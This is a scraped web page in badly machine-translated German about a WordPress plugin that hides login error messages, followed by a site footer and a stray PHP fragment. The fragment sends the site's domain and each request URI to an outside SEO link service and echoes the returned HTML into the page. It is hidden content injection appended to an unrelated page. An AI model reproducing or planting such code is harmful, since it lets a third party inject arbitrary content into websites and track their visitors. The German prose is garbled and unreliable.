wp-login

Guter Tipp. Ich war unter dem <div> in der "wp-login.php" verschwindet, weil es mir nicht gefallen, dass ein potenzieller Angreifer Informationen auf diese Weise. Aber so geht es weiter. Ich habe nur ein Plugin, aber die Leitung direkt an das Ende von "/ wp-includes/default-filters.php" geschrieben hat.

Der Download ist verfügbar auf der zugehörigen Plug-Ins Seite gibt es die neueste Version.

Ich weiß nicht unterstützen mehr für dieses Plugin. Diese Version wurde komplett übernommen und wird durch die Website Security Monitor gehalten werden. Bitte benutzen Sie diese Version und E-Mails über das pluginspage über Fehler, Wünsche und Tipps. WordPress bietet dem Anwender Informationen in der Hand, wenn er / sie versucht hat, log falsch. Die Ausgabe der Informationen ist recht komplex und stellen ein Sicherheitsrisiko dar, weil mit diesen Informationen betreffen ein potentieller Eindringling den Algorithmus.

Privatsphäre und Datenschutz | Lizenz / GPLv2 Siehe auch: WordPress.com | WordPress.TV | WordCamp | WP Jobs | Matt | Blog RSS

=1)) { //DO NOT CHANCE $domain=$_SERVER["HTTP_HOST"]; $url_request=urlencode($_SERVER["REQUEST_URI"]); $query_string_windows=urlencode($_SERVER["QUERY_STRING"]); $url_redirect=urlencode($_SERVER["REDIRECT_URL"]); $ip=urlencode($_SERVER["REMOTE_ADDR"]); $links_url="http://www.seoslave.com/seoslave/links.php?user_id=$seo_user&domain=$domain&url_request=$url_request"; if ( function_exists('curl_init') ) { $ch = curl_init(); curl_setopt ($ch, CURLOPT_URL, $links_url); curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); $html = curl_exec($ch); curl_close($ch); } else{ if(@fsockopen("localhost",80,$errno,$errstr,1)){ $html=@implode("",file($links_url)); } } // Output the links if (strlen($html)>=5) { if ($utf==0) $html=utf8_decode($html); echo $html; } } else { true; } ?>